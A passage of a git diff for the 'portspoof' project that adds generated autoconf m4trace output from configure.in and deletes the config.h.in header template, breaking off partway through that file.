-1- AC_SUBST_TRACE([DEFS]) +m4trace:configure.in:7: -1- m4_pattern_allow([^DEFS$]) +m4trace:configure.in:7: -1- AC_SUBST([ECHO_C]) +m4trace:configure.in:7: -1- AC_SUBST_TRACE([ECHO_C]) +m4trace:configure.in:7: -1- m4_pattern_allow([^ECHO_C$]) +m4trace:configure.in:7: -1- AC_SUBST([ECHO_N]) +m4trace:configure.in:7: -1- AC_SUBST_TRACE([ECHO_N]) +m4trace:configure.in:7: -1- m4_pattern_allow([^ECHO_N$]) +m4trace:configure.in:7: -1- AC_SUBST([ECHO_T]) +m4trace:configure.in:7: -1- AC_SUBST_TRACE([ECHO_T]) +m4trace:configure.in:7: -1- m4_pattern_allow([^ECHO_T$]) +m4trace:configure.in:7: -1- AC_SUBST([LIBS]) +m4trace:configure.in:7: -1- AC_SUBST_TRACE([LIBS]) +m4trace:configure.in:7: -1- m4_pattern_allow([^LIBS$]) +m4trace:configure.in:7: -1- AC_SUBST([build_alias]) +m4trace:configure.in:7: -1- AC_SUBST_TRACE([build_alias]) +m4trace:configure.in:7: -1- m4_pattern_allow([^build_alias$]) +m4trace:configure.in:7: -1- AC_SUBST([host_alias]) +m4trace:configure.in:7: -1- AC_SUBST_TRACE([host_alias]) +m4trace:configure.in:7: -1- m4_pattern_allow([^host_alias$]) +m4trace:configure.in:7: -1- AC_SUBST([target_alias]) +m4trace:configure.in:7: -1- AC_SUBST_TRACE([target_alias]) +m4trace:configure.in:7: -1- m4_pattern_allow([^target_alias$]) +m4trace:configure.in:8: -1- AC_CONFIG_AUX_DIR([auto]) +m4trace:configure.in:11: -1- AM_INIT_AUTOMAKE([portspoof], [1.0]) +m4trace:configure.in:11: -1- m4_pattern_allow([^AM_[A-Z]+FLAGS$]) +m4trace:configure.in:11: -1- AM_AUTOMAKE_VERSION([1.11.1]) +m4trace:configure.in:11: -1- AC_REQUIRE_AUX_FILE([install-sh]) +m4trace:configure.in:11: -1- AC_SUBST([INSTALL_PROGRAM]) +m4trace:configure.in:11: -1- AC_SUBST_TRACE([INSTALL_PROGRAM]) +m4trace:configure.in:11: -1- m4_pattern_allow([^INSTALL_PROGRAM$]) +m4trace:configure.in:11: -1- AC_SUBST([INSTALL_SCRIPT]) +m4trace:configure.in:11: -1- AC_SUBST_TRACE([INSTALL_SCRIPT]) +m4trace:configure.in:11: -1- m4_pattern_allow([^INSTALL_SCRIPT$]) +m4trace:configure.in:11: -1- AC_SUBST([INSTALL_DATA]) +m4trace:configure.in:11: -1- AC_SUBST_TRACE([INSTALL_DATA]) +m4trace:configure.in:11: -1- m4_pattern_allow([^INSTALL_DATA$]) +m4trace:configure.in:11: -1- AC_SUBST([am__isrc], [' -I$(srcdir)']) +m4trace:configure.in:11: -1- AC_SUBST_TRACE([am__isrc]) +m4trace:configure.in:11: -1- m4_pattern_allow([^am__isrc$]) +m4trace:configure.in:11: -1- _AM_SUBST_NOTMAKE([am__isrc]) +m4trace:configure.in:11: -1- AC_SUBST([CYGPATH_W]) +m4trace:configure.in:11: -1- AC_SUBST_TRACE([CYGPATH_W]) +m4trace:configure.in:11: -1- m4_pattern_allow([^CYGPATH_W$]) +m4trace:configure.in:11: -1- AC_SUBST([PACKAGE], [portspoof]) +m4trace:configure.in:11: -1- AC_SUBST_TRACE([PACKAGE]) +m4trace:configure.in:11: -1- m4_pattern_allow([^PACKAGE$]) +m4trace:configure.in:11: -1- AC_SUBST([VERSION], [1.0]) +m4trace:configure.in:11: -1- AC_SUBST_TRACE([VERSION]) +m4trace:configure.in:11: -1- m4_pattern_allow([^VERSION$]) +m4trace:configure.in:11: -1- AC_DEFINE_TRACE_LITERAL([PACKAGE]) +m4trace:configure.in:11: -1- m4_pattern_allow([^PACKAGE$]) +m4trace:configure.in:11: -1- AH_OUTPUT([PACKAGE], [/* Name of package */ +@%:@undef PACKAGE]) +m4trace:configure.in:11: -1- AC_DEFINE_TRACE_LITERAL([VERSION]) +m4trace:configure.in:11: -1- m4_pattern_allow([^VERSION$]) +m4trace:configure.in:11: -1- AH_OUTPUT([VERSION], [/* Version number of package */ +@%:@undef VERSION]) +m4trace:configure.in:11: -1- AC_REQUIRE_AUX_FILE([missing]) +m4trace:configure.in:11: -1- AC_SUBST([ACLOCAL]) +m4trace:configure.in:11: -1- AC_SUBST_TRACE([ACLOCAL]) +m4trace:configure.in:11: -1- m4_pattern_allow([^ACLOCAL$]) +m4trace:configure.in:11: -1- AC_SUBST([AUTOCONF]) +m4trace:configure.in:11: -1- AC_SUBST_TRACE([AUTOCONF]) +m4trace:configure.in:11: -1- m4_pattern_allow([^AUTOCONF$]) +m4trace:configure.in:11: -1- AC_SUBST([AUTOMAKE]) +m4trace:configure.in:11: -1- AC_SUBST_TRACE([AUTOMAKE]) +m4trace:configure.in:11: -1- m4_pattern_allow([^AUTOMAKE$]) +m4trace:configure.in:11: -1- AC_SUBST([AUTOHEADER]) +m4trace:configure.in:11: -1- AC_SUBST_TRACE([AUTOHEADER]) +m4trace:configure.in:11: -1- m4_pattern_allow([^AUTOHEADER$]) +m4trace:configure.in:11: -1- AC_SUBST([MAKEINFO]) +m4trace:configure.in:11: -1- AC_SUBST_TRACE([MAKEINFO]) +m4trace:configure.in:11: -1- m4_pattern_allow([^MAKEINFO$]) +m4trace:configure.in:11: -1- AC_SUBST([install_sh]) +m4trace:configure.in:11: -1- AC_SUBST_TRACE([install_sh]) +m4trace:configure.in:11: -1- m4_pattern_allow([^install_sh$]) +m4trace:configure.in:11: -1- AC_SUBST([STRIP]) +m4trace:configure.in:11: -1- AC_SUBST_TRACE([STRIP]) +m4trace:configure.in:11: -1- m4_pattern_allow([^STRIP$]) +m4trace:configure.in:11: -1- AC_SUBST([INSTALL_STRIP_PROGRAM]) +m4trace:configure.in:11: -1- AC_SUBST_TRACE([INSTALL_STRIP_PROGRAM]) +m4trace:configure.in:11: -1- m4_pattern_allow([^INSTALL_STRIP_PROGRAM$]) +m4trace:configure.in:11: -1- AC_REQUIRE_AUX_FILE([install-sh]) +m4trace:configure.in:11: -1- AC_SUBST([MKDIR_P]) +m4trace:configure.in:11: -1- AC_SUBST_TRACE([MKDIR_P]) +m4trace:configure.in:11: -1- m4_pattern_allow([^MKDIR_P$]) +m4trace:configure.in:11: -1- AC_SUBST([mkdir_p], ["$MKDIR_P"]) +m4trace:configure.in:11: -1- AC_SUBST_TRACE([mkdir_p]) +m4trace:configure.in:11: -1- m4_pattern_allow([^mkdir_p$]) +m4trace:configure.in:11: -1- AC_SUBST([AWK]) +m4trace:configure.in:11: -1- AC_SUBST_TRACE([AWK]) +m4trace:configure.in:11: -1- m4_pattern_allow([^AWK$]) +m4trace:configure.in:11: -1- AC_SUBST([SET_MAKE]) +m4trace:configure.in:11: -1- AC_SUBST_TRACE([SET_MAKE]) +m4trace:configure.in:11: -1- m4_pattern_allow([^SET_MAKE$]) +m4trace:configure.in:11: -1- AC_SUBST([am__leading_dot]) +m4trace:configure.in:11: -1- AC_SUBST_TRACE([am__leading_dot]) +m4trace:configure.in:11: -1- m4_pattern_allow([^am__leading_dot$]) +m4trace:configure.in:11: -1- AC_SUBST([AMTAR]) +m4trace:configure.in:11: -1- AC_SUBST_TRACE([AMTAR]) +m4trace:configure.in:11: -1- m4_pattern_allow([^AMTAR$]) +m4trace:configure.in:11: -1- AC_SUBST([am__tar]) +m4trace:configure.in:11: -1- AC_SUBST_TRACE([am__tar]) +m4trace:configure.in:11: -1- m4_pattern_allow([^am__tar$]) +m4trace:configure.in:11: -1- AC_SUBST([am__untar]) +m4trace:configure.in:11: -1- AC_SUBST_TRACE([am__untar]) +m4trace:configure.in:11: -1- m4_pattern_allow([^am__untar$]) +m4trace:configure.in:13: -1- AC_CONFIG_HEADERS([src/config.h]) +m4trace:configure.in:14: -1- AC_DEFINE_TRACE_LITERAL([_GNU_SOURCE]) +m4trace:configure.in:14: -1- m4_pattern_allow([^_GNU_SOURCE$]) +m4trace:configure.in:14: -1- AH_OUTPUT([_GNU_SOURCE], [/* Use GNU source */ +@%:@undef _GNU_SOURCE]) +m4trace:configure.in:18: -1- AC_CANONICAL_HOST +m4trace:configure.in:18: -1- AC_CANONICAL_BUILD +m4trace:configure.in:18: -1- AC_REQUIRE_AUX_FILE([config.sub]) +m4trace:configure.in:18: -1- AC_REQUIRE_AUX_FILE([config.guess]) +m4trace:configure.in:18: -1- AC_SUBST([build], [$ac_cv_build]) +m4trace:configure.in:18: -1- AC_SUBST_TRACE([build]) +m4trace:configure.in:18: -1- m4_pattern_allow([^build$]) +m4trace:configure.in:18: -1- AC_SUBST([build_cpu], [$[1]]) +m4trace:configure.in:18: -1- AC_SUBST_TRACE([build_cpu]) +m4trace:configure.in:18: -1- m4_pattern_allow([^build_cpu$]) +m4trace:configure.in:18: -1- AC_SUBST([build_vendor], [$[2]]) +m4trace:configure.in:18: -1- AC_SUBST_TRACE([build_vendor]) +m4trace:configure.in:18: -1- m4_pattern_allow([^build_vendor$]) +m4trace:configure.in:18: -1- AC_SUBST([build_os]) +m4trace:configure.in:18: -1- AC_SUBST_TRACE([build_os]) +m4trace:configure.in:18: -1- m4_pattern_allow([^build_os$]) +m4trace:configure.in:18: -1- AC_SUBST([host], [$ac_cv_host]) +m4trace:configure.in:18: -1- AC_SUBST_TRACE([host]) +m4trace:configure.in:18: -1- m4_pattern_allow([^host$]) +m4trace:configure.in:18: -1- AC_SUBST([host_cpu], [$[1]]) +m4trace:configure.in:18: -1- AC_SUBST_TRACE([host_cpu]) +m4trace:configure.in:18: -1- m4_pattern_allow([^host_cpu$]) +m4trace:configure.in:18: -1- AC_SUBST([host_vendor], [$[2]]) +m4trace:configure.in:18: -1- AC_SUBST_TRACE([host_vendor]) +m4trace:configure.in:18: -1- m4_pattern_allow([^host_vendor$]) +m4trace:configure.in:18: -1- AC_SUBST([host_os]) +m4trace:configure.in:18: -1- AC_SUBST_TRACE([host_os]) +m4trace:configure.in:18: -1- m4_pattern_allow([^host_os$]) +m4trace:configure.in:19: -1- AC_SUBST([host]) +m4trace:configure.in:19: -1- AC_SUBST_TRACE([host]) +m4trace:configure.in:19: -1- m4_pattern_allow([^host$]) +m4trace:configure.in:24: -1- AC_DEFINE_TRACE_LITERAL([LINUX]) +m4trace:configure.in:24: -1- m4_pattern_allow([^LINUX$]) +m4trace:configure.in:24: -1- AH_OUTPUT([LINUX], [/* This is a Linux system */ +@%:@undef LINUX]) +m4trace:configure.in:29: -1- AC_SUBST([CXX]) +m4trace:configure.in:29: -1- AC_SUBST_TRACE([CXX]) +m4trace:configure.in:29: -1- m4_pattern_allow([^CXX$]) +m4trace:configure.in:29: -1- AC_SUBST([CXXFLAGS]) +m4trace:configure.in:29: -1- AC_SUBST_TRACE([CXXFLAGS]) +m4trace:configure.in:29: -1- m4_pattern_allow([^CXXFLAGS$]) +m4trace:configure.in:29: -1- AC_SUBST([LDFLAGS]) +m4trace:configure.in:29: -1- AC_SUBST_TRACE([LDFLAGS]) +m4trace:configure.in:29: -1- m4_pattern_allow([^LDFLAGS$]) +m4trace:configure.in:29: -1- AC_SUBST([LIBS]) +m4trace:configure.in:29: -1- AC_SUBST_TRACE([LIBS]) +m4trace:configure.in:29: -1- m4_pattern_allow([^LIBS$]) +m4trace:configure.in:29: -1- AC_SUBST([CPPFLAGS]) +m4trace:configure.in:29: -1- AC_SUBST_TRACE([CPPFLAGS]) +m4trace:configure.in:29: -1- m4_pattern_allow([^CPPFLAGS$]) +m4trace:configure.in:29: -1- AC_SUBST([CXX]) +m4trace:configure.in:29: -1- AC_SUBST_TRACE([CXX]) +m4trace:configure.in:29: -1- m4_pattern_allow([^CXX$]) +m4trace:configure.in:29: -1- AC_SUBST([ac_ct_CXX]) +m4trace:configure.in:29: -1- AC_SUBST_TRACE([ac_ct_CXX]) +m4trace:configure.in:29: -1- m4_pattern_allow([^ac_ct_CXX$]) +m4trace:configure.in:29: -1- AC_SUBST([EXEEXT], [$ac_cv_exeext]) +m4trace:configure.in:29: -1- AC_SUBST_TRACE([EXEEXT]) +m4trace:configure.in:29: -1- m4_pattern_allow([^EXEEXT$]) +m4trace:configure.in:29: -1- AC_SUBST([OBJEXT], [$ac_cv_objext]) +m4trace:configure.in:29: -1- AC_SUBST_TRACE([OBJEXT]) +m4trace:configure.in:29: -1- m4_pattern_allow([^OBJEXT$]) +m4trace:configure.in:29: -1- AC_SUBST([DEPDIR], ["${am__leading_dot}deps"]) +m4trace:configure.in:29: -1- AC_SUBST_TRACE([DEPDIR]) +m4trace:configure.in:29: -1- m4_pattern_allow([^DEPDIR$]) +m4trace:configure.in:29: -1- AC_SUBST([am__include]) +m4trace:configure.in:29: -1- AC_SUBST_TRACE([am__include]) +m4trace:configure.in:29: -1- m4_pattern_allow([^am__include$]) +m4trace:configure.in:29: -1- AC_SUBST([am__quote]) +m4trace:configure.in:29: -1- AC_SUBST_TRACE([am__quote]) +m4trace:configure.in:29: -1- m4_pattern_allow([^am__quote$]) +m4trace:configure.in:29: -1- AM_CONDITIONAL([AMDEP], [test "x$enable_dependency_tracking" != xno]) +m4trace:configure.in:29: -1- AC_SUBST([AMDEP_TRUE]) +m4trace:configure.in:29: -1- AC_SUBST_TRACE([AMDEP_TRUE]) +m4trace:configure.in:29: -1- m4_pattern_allow([^AMDEP_TRUE$]) +m4trace:configure.in:29: -1- AC_SUBST([AMDEP_FALSE]) +m4trace:configure.in:29: -1- AC_SUBST_TRACE([AMDEP_FALSE]) +m4trace:configure.in:29: -1- m4_pattern_allow([^AMDEP_FALSE$]) +m4trace:configure.in:29: -1- _AM_SUBST_NOTMAKE([AMDEP_TRUE]) +m4trace:configure.in:29: -1- _AM_SUBST_NOTMAKE([AMDEP_FALSE]) +m4trace:configure.in:29: -1- AC_SUBST([AMDEPBACKSLASH]) +m4trace:configure.in:29: -1- AC_SUBST_TRACE([AMDEPBACKSLASH]) +m4trace:configure.in:29: -1- m4_pattern_allow([^AMDEPBACKSLASH$]) +m4trace:configure.in:29: -1- _AM_SUBST_NOTMAKE([AMDEPBACKSLASH]) +m4trace:configure.in:29: -1- AC_SUBST([CXXDEPMODE], [depmode=$am_cv_CXX_dependencies_compiler_type]) +m4trace:configure.in:29: -1- AC_SUBST_TRACE([CXXDEPMODE]) +m4trace:configure.in:29: -1- m4_pattern_allow([^CXXDEPMODE$]) +m4trace:configure.in:29: -1- AM_CONDITIONAL([am__fastdepCXX], [ + test "x$enable_dependency_tracking" != xno \ + && test "$am_cv_CXX_dependencies_compiler_type" = gcc3]) +m4trace:configure.in:29: -1- AC_SUBST([am__fastdepCXX_TRUE]) +m4trace:configure.in:29: -1- AC_SUBST_TRACE([am__fastdepCXX_TRUE]) +m4trace:configure.in:29: -1- m4_pattern_allow([^am__fastdepCXX_TRUE$]) +m4trace:configure.in:29: -1- AC_SUBST([am__fastdepCXX_FALSE]) +m4trace:configure.in:29: -1- AC_SUBST_TRACE([am__fastdepCXX_FALSE]) +m4trace:configure.in:29: -1- m4_pattern_allow([^am__fastdepCXX_FALSE$]) +m4trace:configure.in:29: -1- _AM_SUBST_NOTMAKE([am__fastdepCXX_TRUE]) +m4trace:configure.in:29: -1- _AM_SUBST_NOTMAKE([am__fastdepCXX_FALSE]) +m4trace:configure.in:30: -1- AM_PROG_CC_C_O +m4trace:configure.in:30: -1- AC_SUBST([CC]) +m4trace:configure.in:30: -1- AC_SUBST_TRACE([CC]) +m4trace:configure.in:30: -1- m4_pattern_allow([^CC$]) +m4trace:configure.in:30: -1- AC_SUBST([CFLAGS]) +m4trace:configure.in:30: -1- AC_SUBST_TRACE([CFLAGS]) +m4trace:configure.in:30: -1- m4_pattern_allow([^CFLAGS$]) +m4trace:configure.in:30: -1- AC_SUBST([LDFLAGS]) +m4trace:configure.in:30: -1- AC_SUBST_TRACE([LDFLAGS]) +m4trace:configure.in:30: -1- m4_pattern_allow([^LDFLAGS$]) +m4trace:configure.in:30: -1- AC_SUBST([LIBS]) +m4trace:configure.in:30: -1- AC_SUBST_TRACE([LIBS]) +m4trace:configure.in:30: -1- m4_pattern_allow([^LIBS$]) +m4trace:configure.in:30: -1- AC_SUBST([CPPFLAGS]) +m4trace:configure.in:30: -1- AC_SUBST_TRACE([CPPFLAGS]) +m4trace:configure.in:30: -1- m4_pattern_allow([^CPPFLAGS$]) +m4trace:configure.in:30: -1- AC_SUBST([CC]) +m4trace:configure.in:30: -1- AC_SUBST_TRACE([CC]) +m4trace:configure.in:30: -1- m4_pattern_allow([^CC$]) +m4trace:configure.in:30: -1- AC_SUBST([CC]) +m4trace:configure.in:30: -1- AC_SUBST_TRACE([CC]) +m4trace:configure.in:30: -1- m4_pattern_allow([^CC$]) +m4trace:configure.in:30: -1- AC_SUBST([CC]) +m4trace:configure.in:30: -1- AC_SUBST_TRACE([CC]) +m4trace:configure.in:30: -1- m4_pattern_allow([^CC$]) +m4trace:configure.in:30: -1- AC_SUBST([CC]) +m4trace:configure.in:30: -1- AC_SUBST_TRACE([CC]) +m4trace:configure.in:30: -1- m4_pattern_allow([^CC$]) +m4trace:configure.in:30: -1- AC_SUBST([ac_ct_CC]) +m4trace:configure.in:30: -1- AC_SUBST_TRACE([ac_ct_CC]) +m4trace:configure.in:30: -1- m4_pattern_allow([^ac_ct_CC$]) +m4trace:configure.in:30: -1- AC_SUBST([CCDEPMODE], [depmode=$am_cv_CC_dependencies_compiler_type]) +m4trace:configure.in:30: -1- AC_SUBST_TRACE([CCDEPMODE]) +m4trace:configure.in:30: -1- m4_pattern_allow([^CCDEPMODE$]) +m4trace:configure.in:30: -1- AM_CONDITIONAL([am__fastdepCC], [ + test "x$enable_dependency_tracking" != xno \ + && test "$am_cv_CC_dependencies_compiler_type" = gcc3]) +m4trace:configure.in:30: -1- AC_SUBST([am__fastdepCC_TRUE]) +m4trace:configure.in:30: -1- AC_SUBST_TRACE([am__fastdepCC_TRUE]) +m4trace:configure.in:30: -1- m4_pattern_allow([^am__fastdepCC_TRUE$]) +m4trace:configure.in:30: -1- AC_SUBST([am__fastdepCC_FALSE]) +m4trace:configure.in:30: -1- AC_SUBST_TRACE([am__fastdepCC_FALSE]) +m4trace:configure.in:30: -1- m4_pattern_allow([^am__fastdepCC_FALSE$]) +m4trace:configure.in:30: -1- _AM_SUBST_NOTMAKE([am__fastdepCC_TRUE]) +m4trace:configure.in:30: -1- _AM_SUBST_NOTMAKE([am__fastdepCC_FALSE]) +m4trace:configure.in:30: -1- AC_DEFINE_TRACE_LITERAL([NO_MINUS_C_MINUS_O]) +m4trace:configure.in:30: -1- m4_pattern_allow([^NO_MINUS_C_MINUS_O$]) +m4trace:configure.in:30: -1- AH_OUTPUT([NO_MINUS_C_MINUS_O], [/* Define to 1 if your C compiler doesn\'t accept -c and -o together. */ +@%:@undef NO_MINUS_C_MINUS_O]) +m4trace:configure.in:30: -1- AC_REQUIRE_AUX_FILE([compile]) +m4trace:configure.in:32: -1- AC_SUBST([SET_MAKE]) +m4trace:configure.in:32: -1- AC_SUBST_TRACE([SET_MAKE]) +m4trace:configure.in:32: -1- m4_pattern_allow([^SET_MAKE$]) +m4trace:configure.in:37: -1- AC_SUBST([CPP]) +m4trace:configure.in:37: -1- AC_SUBST_TRACE([CPP]) +m4trace:configure.in:37: -1- m4_pattern_allow([^CPP$]) +m4trace:configure.in:37: -1- AC_SUBST([CPPFLAGS]) +m4trace:configure.in:37: -1- AC_SUBST_TRACE([CPPFLAGS]) +m4trace:configure.in:37: -1- m4_pattern_allow([^CPPFLAGS$]) +m4trace:configure.in:37: -1- AC_SUBST([CPP]) +m4trace:configure.in:37: -1- AC_SUBST_TRACE([CPP]) +m4trace:configure.in:37: -1- m4_pattern_allow([^CPP$]) +m4trace:configure.in:37: -1- AC_SUBST([GREP]) +m4trace:configure.in:37: -1- AC_SUBST_TRACE([GREP]) +m4trace:configure.in:37: -1- m4_pattern_allow([^GREP$]) +m4trace:configure.in:37: -1- AC_SUBST([EGREP]) +m4trace:configure.in:37: -1- AC_SUBST_TRACE([EGREP]) +m4trace:configure.in:37: -1- m4_pattern_allow([^EGREP$]) +m4trace:configure.in:37: -1- AC_DEFINE_TRACE_LITERAL([STDC_HEADERS]) +m4trace:configure.in:37: -1- m4_pattern_allow([^STDC_HEADERS$]) +m4trace:configure.in:37: -1- AH_OUTPUT([STDC_HEADERS], [/* Define to 1 if you have the ANSI C header files. */ +@%:@undef STDC_HEADERS]) +m4trace:configure.in:38: -1- AC_DEFINE_TRACE_LITERAL([HAVE_SYS_WAIT_H]) +m4trace:configure.in:38: -1- m4_pattern_allow([^HAVE_SYS_WAIT_H$]) +m4trace:configure.in:38: -1- AH_OUTPUT([HAVE_SYS_WAIT_H], [/* Define to 1 if you have that is POSIX.1 compatible. */ +@%:@undef HAVE_SYS_WAIT_H]) +m4trace:configure.in:39: -1- AH_OUTPUT([HAVE_FCNTL_H], [/* Define to 1 if you have the header file. */ +@%:@undef HAVE_FCNTL_H]) +m4trace:configure.in:39: -1- AH_OUTPUT([HAVE_LIMITS_H], [/* Define to 1 if you have the header file. */ +@%:@undef HAVE_LIMITS_H]) +m4trace:configure.in:39: -1- AH_OUTPUT([HAVE_NETDB_H], [/* Define to 1 if you have the header file. */ +@%:@undef HAVE_NETDB_H]) +m4trace:configure.in:39: -1- AH_OUTPUT([HAVE_NETINET_IN_H], [/* Define to 1 if you have the header file. */ +@%:@undef HAVE_NETINET_IN_H]) +m4trace:configure.in:39: -1- AH_OUTPUT([HAVE_STDLIB_H], [/* Define to 1 if you have the header file. */ +@%:@undef HAVE_STDLIB_H]) +m4trace:configure.in:39: -1- AH_OUTPUT([HAVE_STRING_H], [/* Define to 1 if you have the header file. */ +@%:@undef HAVE_STRING_H]) +m4trace:configure.in:39: -1- AH_OUTPUT([HAVE_SYS_IOCTL_H], [/* Define to 1 if you have the header file. */ +@%:@undef HAVE_SYS_IOCTL_H]) +m4trace:configure.in:39: -1- AH_OUTPUT([HAVE_SYS_SOCKET_H], [/* Define to 1 if you have the header file. */ +@%:@undef HAVE_SYS_SOCKET_H]) +m4trace:configure.in:39: -1- AH_OUTPUT([HAVE_SYS_TIMEB_H], [/* Define to 1 if you have the header file. */ +@%:@undef HAVE_SYS_TIMEB_H]) +m4trace:configure.in:39: -1- AH_OUTPUT([HAVE_SYSLOG_H], [/* Define to 1 if you have the header file. */ +@%:@undef HAVE_SYSLOG_H]) +m4trace:configure.in:39: -1- AH_OUTPUT([HAVE_UNISTD_H], [/* Define to 1 if you have the header file. */ +@%:@undef HAVE_UNISTD_H]) +m4trace:configure.in:39: -1- AH_OUTPUT([HAVE_SYS_TYPES_H], [/* Define to 1 if you have the header file. */ +@%:@undef HAVE_SYS_TYPES_H]) +m4trace:configure.in:39: -1- AH_OUTPUT([HAVE_SYS_STAT_H], [/* Define to 1 if you have the header file. */ +@%:@undef HAVE_SYS_STAT_H]) +m4trace:configure.in:39: -1- AH_OUTPUT([HAVE_STDLIB_H], [/* Define to 1 if you have the header file. */ +@%:@undef HAVE_STDLIB_H]) +m4trace:configure.in:39: -1- AH_OUTPUT([HAVE_STRING_H], [/* Define to 1 if you have the header file. */ +@%:@undef HAVE_STRING_H]) +m4trace:configure.in:39: -1- AH_OUTPUT([HAVE_MEMORY_H], [/* Define to 1 if you have the header file. */ +@%:@undef HAVE_MEMORY_H]) +m4trace:configure.in:39: -1- AH_OUTPUT([HAVE_STRINGS_H], [/* Define to 1 if you have the header file. */ +@%:@undef HAVE_STRINGS_H]) +m4trace:configure.in:39: -1- AH_OUTPUT([HAVE_INTTYPES_H], [/* Define to 1 if you have the header file. */ +@%:@undef HAVE_INTTYPES_H]) +m4trace:configure.in:39: -1- AH_OUTPUT([HAVE_STDINT_H], [/* Define to 1 if you have the header file. */ +@%:@undef HAVE_STDINT_H]) +m4trace:configure.in:39: -1- AH_OUTPUT([HAVE_UNISTD_H], [/* Define to 1 if you have the header file. */ +@%:@undef HAVE_UNISTD_H]) +m4trace:configure.in:42: -1- AC_DEFINE_TRACE_LITERAL([const]) +m4trace:configure.in:42: -1- m4_pattern_allow([^const$]) +m4trace:configure.in:42: -1- AH_OUTPUT([const], [/* Define to empty if `const\' does not conform to ANSI C. */ +@%:@undef const]) +m4trace:configure.in:43: -1- AC_DEFINE_TRACE_LITERAL([size_t]) +m4trace:configure.in:43: -1- m4_pattern_allow([^size_t$]) +m4trace:configure.in:43: -1- AH_OUTPUT([size_t], [/* Define to `unsigned int\' if does not define. */ +@%:@undef size_t]) +m4trace:configure.in:46: -1- AH_OUTPUT([HAVE_STDLIB_H], [/* Define to 1 if you have the header file. */ +@%:@undef HAVE_STDLIB_H]) +m4trace:configure.in:46: -1- AC_DEFINE_TRACE_LITERAL([HAVE_STDLIB_H]) +m4trace:configure.in:46: -1- m4_pattern_allow([^HAVE_STDLIB_H$]) +m4trace:configure.in:46: -1- AC_DEFINE_TRACE_LITERAL([HAVE_MALLOC]) +m4trace:configure.in:46: -1- m4_pattern_allow([^HAVE_MALLOC$]) +m4trace:configure.in:46: -1- AH_OUTPUT([HAVE_MALLOC], [/* Define to 1 if your system has a GNU libc compatible `malloc\' function, and + to 0 otherwise. */ +@%:@undef HAVE_MALLOC]) +m4trace:configure.in:46: -1- AC_DEFINE_TRACE_LITERAL([HAVE_MALLOC]) +m4trace:configure.in:46: -1- m4_pattern_allow([^HAVE_MALLOC$]) +m4trace:configure.in:46: -1- AC_LIBSOURCE([malloc.c]) +m4trace:configure.in:46: -1- AC_SUBST([LIB@&t@OBJS], ["$LIB@&t@OBJS malloc.$ac_objext"]) +m4trace:configure.in:46: -1- AC_SUBST_TRACE([LIB@&t@OBJS]) +m4trace:configure.in:46: -1- m4_pattern_allow([^LIB@&t@OBJS$]) +m4trace:configure.in:46: -1- AC_DEFINE_TRACE_LITERAL([malloc]) +m4trace:configure.in:46: -1- m4_pattern_allow([^malloc$]) +m4trace:configure.in:46: -1- AH_OUTPUT([malloc], [/* Define to rpl_malloc if the replacement function should be used. */ +@%:@undef malloc]) +m4trace:configure.in:47: -1- AH_OUTPUT([HAVE_INET_NTOA], [/* Define to 1 if you have the `inet_ntoa\' function. */ +@%:@undef HAVE_INET_NTOA]) +m4trace:configure.in:47: -1- AH_OUTPUT([HAVE_MEMSET], [/* Define to 1 if you have the `memset\' function. */ +@%:@undef HAVE_MEMSET]) +m4trace:configure.in:47: -1- AH_OUTPUT([HAVE_SOCKET], [/* Define to 1 if you have the `socket\' function. */ +@%:@undef HAVE_SOCKET]) +m4trace:configure.in:49: -1- AC_CONFIG_FILES([Makefile src/Makefile tools/Makefile]) +m4trace:configure.in:50: -1- AC_SUBST([LIB@&t@OBJS], [$ac_libobjs]) +m4trace:configure.in:50: -1- AC_SUBST_TRACE([LIB@&t@OBJS]) +m4trace:configure.in:50: -1- m4_pattern_allow([^LIB@&t@OBJS$]) +m4trace:configure.in:50: -1- AC_SUBST([LTLIBOBJS], [$ac_ltlibobjs]) +m4trace:configure.in:50: -1- AC_SUBST_TRACE([LTLIBOBJS]) +m4trace:configure.in:50: -1- m4_pattern_allow([^LTLIBOBJS$]) +m4trace:configure.in:50: -1- AM_CONDITIONAL([am__EXEEXT], [test -n "$EXEEXT"]) +m4trace:configure.in:50: -1- AC_SUBST([am__EXEEXT_TRUE]) +m4trace:configure.in:50: -1- AC_SUBST_TRACE([am__EXEEXT_TRUE]) +m4trace:configure.in:50: -1- m4_pattern_allow([^am__EXEEXT_TRUE$]) +m4trace:configure.in:50: -1- AC_SUBST([am__EXEEXT_FALSE]) +m4trace:configure.in:50: -1- AC_SUBST_TRACE([am__EXEEXT_FALSE]) +m4trace:configure.in:50: -1- m4_pattern_allow([^am__EXEEXT_FALSE$]) +m4trace:configure.in:50: -1- _AM_SUBST_NOTMAKE([am__EXEEXT_TRUE]) +m4trace:configure.in:50: -1- _AM_SUBST_NOTMAKE([am__EXEEXT_FALSE]) +m4trace:configure.in:50: -1- AC_SUBST_TRACE([top_builddir]) +m4trace:configure.in:50: -1- AC_SUBST_TRACE([top_build_prefix]) +m4trace:configure.in:50: -1- AC_SUBST_TRACE([srcdir]) +m4trace:configure.in:50: -1- AC_SUBST_TRACE([abs_srcdir]) +m4trace:configure.in:50: -1- AC_SUBST_TRACE([top_srcdir]) +m4trace:configure.in:50: -1- AC_SUBST_TRACE([abs_top_srcdir]) +m4trace:configure.in:50: -1- AC_SUBST_TRACE([builddir]) +m4trace:configure.in:50: -1- AC_SUBST_TRACE([abs_builddir]) +m4trace:configure.in:50: -1- AC_SUBST_TRACE([abs_top_builddir]) +m4trace:configure.in:50: -1- AC_SUBST_TRACE([INSTALL]) +m4trace:configure.in:50: -1- AC_SUBST_TRACE([MKDIR_P]) diff --git a/config.h.in b/config.h.in deleted file mode 100644 index bf97160..0000000 --- a/config.h.in +++ /dev/null @@ -1,101 +0,0 @@ -/* config.h.in. Generated from configure.in by autoheader. */ - -/* Define to 1 if you have the header file. */ -#undef HAVE_FCNTL_H - -/* Define to 1 if you have the `inet_ntoa' function. */ -#undef HAVE_INET_NTOA - -/* Define to 1 if you have the header file. */ -#undef HAVE_INTTYPES_H - -/* Define to 1 if you have the header file. */ -#undef HAVE_LIMITS_H - -/* Define to 1 if your system has a GNU libc compatible `malloc' function, and - to 0 otherwise. */ -#undef HAVE_MALLOC - -/* Define to 1 if you have the header file. */ -#undef HAVE_MEMORY_H - -/* Define to 1 if you have the `memset' function. */ -#undef HAVE_MEMSET - -/* Define to 1 if you have the header file. */ -#undef HAVE_NETDB_H - -/* Define to 1 if you have the header file. */ -#undef HAVE_NETINET_IN_H - -/* Define to 1 if you have the `socket' function. */ -#undef HAVE_SOCKET - -/* Define to 1 if you have the header file. */ -#undef HAVE_STDINT_H - -/* Define to 1 if you have the header file. */ -#undef 